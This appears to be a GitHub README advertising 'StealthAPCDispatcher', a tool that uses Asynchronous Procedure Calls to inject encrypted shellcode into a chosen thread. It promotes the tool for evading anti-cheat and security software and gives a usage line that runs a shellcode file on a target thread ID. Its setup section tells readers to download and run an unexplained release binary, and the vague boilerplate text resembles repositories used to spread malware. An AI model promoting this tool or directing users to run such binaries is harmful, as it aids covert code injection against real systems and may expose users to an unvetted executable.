Welcome to StealthAPCDispatcher! This project implements a thread scheduling stealth method using Asynchronous Procedure Calls (APC) with encrypted shellcode. This technique is valuable for evading detection in various environments, making it a useful tool for red teams and malware researchers.
StealthAPCDispatcher is designed to provide a stealthy method for thread execution using APC. By employing encrypted shellcode, it minimizes the risk of detection by anti-cheat mechanisms and security software. This tool is essential for professionals engaged in red team operations and malware research.
- Stealth Execution: Uses APC to execute threads without raising flags.
- Encrypted Shellcode: Protects your payload from static analysis.
- Modular Design: Easily extendable for various use cases.
- Lightweight: Minimal resource consumption for efficient operation.
To get started, download the latest release from the Releases section. You need to execute the downloaded file to set up the tool.
-
Clone the repository:
git clone https://github.com/mohanad1-maker/StealthAPCDispatcher.git cd StealthAPCDispatcher -
Download the latest release: Visit the Releases section to find the appropriate file.
-
Execute the file: Run the downloaded file to complete the installation.
Once installed, you can use StealthAPCDispatcher in your red team operations. The tool allows you to inject and execute threads stealthily. Below are some basic commands to get you started.
./StealthAPCDispatcher [options]-h,--help: Display help information.-e,--execute: Specify the shellcode to execute.-t,--thread: Define the target thread ID.
./StealthAPCDispatcher --execute myShellcode.bin --thread 1234This command executes the specified shellcode on the target thread.
We welcome contributions from the community. If you would like to help improve StealthAPCDispatcher, please follow these steps:
- Fork the repository.
- Create a new branch (
git checkout -b feature/YourFeature). - Make your changes and commit them (
git commit -m 'Add new feature'). - Push to the branch (
git push origin feature/YourFeature). - Open a pull request.
This project is licensed under the MIT License. See the LICENSE file for details.
For questions or feedback, please open an issue in the Issues section. You can also reach out via email at your_email@example.com.
StealthAPCDispatcher aims to provide a robust solution for stealthy thread execution. With its unique features and ease of use, it stands as a valuable asset for security professionals. We hope you find this tool useful in your research and operations.
For the latest updates and releases, always check the Releases section.